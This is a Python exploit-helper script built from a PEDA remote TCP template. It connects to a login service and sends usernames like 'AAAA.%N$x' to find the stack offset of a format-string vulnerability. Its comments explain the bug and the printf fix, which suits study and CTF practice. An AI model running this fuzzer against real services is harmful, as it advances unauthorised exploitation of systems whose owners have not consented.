#!/usr/bin/env python
#
# Template for remote TCP exploit code, generated by PEDA
#
import os
import sys
import struct
import resource
import time
import re

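def usage():
    """Print the command-line synopsis (``host port``) to stdout.

    Written as ``print(...)`` with a single argument so the line is valid on
    both Python 2 (the dialect the rest of this script uses) and Python 3;
    the original Python-2-only print statement is a syntax error on 3.
    """
    print("Usage: %s host port" % sys.argv[0])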

from socket import *
import telnetlib
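class TCPClient(object):
    """Minimal blocking TCP client used by ``exploit`` below.

    ``debug`` controls logging: 0 logs nothing, a positive value logs every
    received buffer, and a value above 1 also logs each buffer sent.
    """

    def __init__(self, host, port, debug=0):
        """Open a TCP connection to ``host``:``port``.

        Propagates whatever ``socket.connect`` raises when the peer cannot be
        reached; nothing is caught here.
        """
        self.debug = debug
        self.sock = socket(AF_INET, SOCK_STREAM)
        self.sock.connect((host, port))

    def __enter__(self):
        """Support ``with TCPClient(...) as client:`` so ``close`` always runs."""
        return self

    def __exit__(self, exc_type, exc, tb):
        """Close the socket on leaving a ``with`` block; never swallows errors."""
        self.close()
        return False

    def debug_log(self, size, data, cmd):
        """Print one ``cmd(size): repr(data)`` line when ``debug`` is nonzero."""
        if self.debug != 0:
            print("%s(%d): %s" % (cmd, size, repr(data)))

    def send(self, data, delay=0):
        """Send all of ``data``, sleeping ``delay`` seconds first if nonzero.

        Uses ``sendall`` so a short write cannot silently drop the tail of a
        message (the original single ``send`` could); returns the number of
        bytes sent, which is therefore always ``len(data)``.
        """
        if delay:
            time.sleep(delay)
        self.sock.sendall(data)
        nsend = len(data)
        if self.debug > 1:
            self.debug_log(nsend, data, "send")
        return nsend

    def sendline(self, data, delay=0):
        """Send ``data`` followed by a newline; see ``send``."""
        return self.send(data + "\n", delay)

    def recv(self, size=1024, delay=0):
        """Receive at most ``size`` bytes with a single ``recv`` call.

        May return fewer bytes than ``size``; returns an empty buffer once
        the peer has closed the connection.
        """
        if delay:
            time.sleep(delay)
        buf = self.sock.recv(size)
        if self.debug > 0:
            self.debug_log(len(buf), buf, "recv")
        return buf

    def recv_until(self, delim):
        """Read one byte at a time until the data received ends with ``delim``.

        Returns everything read, ``delim`` included. Raises ``EOFError`` if
        the peer closes the connection before ``delim`` arrives -- the
        original loop spun forever on the empty reads that follow EOF.
        ``endswith`` is equivalent to the original ``delim in buf`` check
        because a new match can only end at the byte just appended.
        """
        buf = bytearray()
        while True:
            c = self.sock.recv(1)
            if not c:
                raise EOFError("connection closed before %r was received" % (delim,))
            buf += c
            if buf.endswith(delim):
                break
        buf = bytes(buf)
        self.debug_log(len(buf), buf, "recv")
        return buf

    def recvline(self):
        """Read up to and including the next newline; see ``recv_until``."""
        return self.recv_until("\n")

    def close(self):
        """Close the underlying socket."""
        self.sock.close()

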
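def exploit(host, port, max_index=1024):
    """Walk a remote login dialogue looking for the stack offset of a format-string bug.

    For ``index`` in 1..``max_index`` the username ``AAAA.%<index>$x`` is
    submitted, the password and email prompts are answered with empty lines,
    and the first single-quoted value in the result message is inspected.
    ``41414141`` is the hex of the ``AAAA`` marker: seeing it echoed back means
    the service passed untrusted input straight through as a printf format
    string. The server-side fix is ``printf("%s", input)``, never
    ``printf(input)``; compiling with ``-Wformat-security`` flags such calls.

    Args:
        host: hostname or IP of the service.
        port: TCP port, as a string or int (converted with ``int``).
        max_index: highest argument index to try; 1024 matches the original
            hard-coded bound.

    Raises:
        ValueError: if ``port`` is not an integer (as in the original, which
            only caught ``KeyboardInterrupt``).
        Anything ``TCPClient`` raises while connecting or talking to the peer.

    Ctrl-C stops the loop quietly; the connection is now closed on every
    exit path (the original leaked it on interrupt and on any error).
    """
    port = int(port)
    client = None
    try:
        client = TCPClient(host, port, debug=0)
        print('[+] Fuzzer started')
        for index in range(1, max_index + 1):
            # Username banner -> crafted username.
            client.recv(1024)
            client.sendline("AAAA.%{0}$x".format(index))

            # Password banner -> empty answer.
            client.recv(1024)
            client.sendline('')

            # Email banner -> empty answer.
            client.recv(1024)
            client.sendline('')

            # Result message: the first single-quoted value is taken to be the
            # echoed username -- TODO confirm against the service's output.
            # An answer with no quoted value used to raise IndexError on l[0];
            # it is now treated as "not found".
            quoted = re.findall(r"'(.*?)'", client.recv(1024))
            found = bool(quoted) and quoted[0].endswith('41414141')
            if found:
                print("[*] stack_index @ {0}".format(index))

            # Retry prompt: 'yes' to keep probing, 'no' once the offset is known.
            client.recv(1024)
            if found:
                client.sendline('no')
                break
            client.sendline('yes')

        print('[-] Fuzzer finished')

    except KeyboardInterrupt:
        # Deliberate quiet stop on Ctrl-C; cleanup happens in ``finally``.
        pass
    finally:
        if client is not None:
            client.close()
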
if __name__ == "__main__":
    # Two positional arguments (host, port) are required; any extra
    # arguments are ignored, exactly as the original length check did.
    args = sys.argv[1:]
    if len(args) >= 2:
        exploit(args[0], args[1])
    else:
        usage()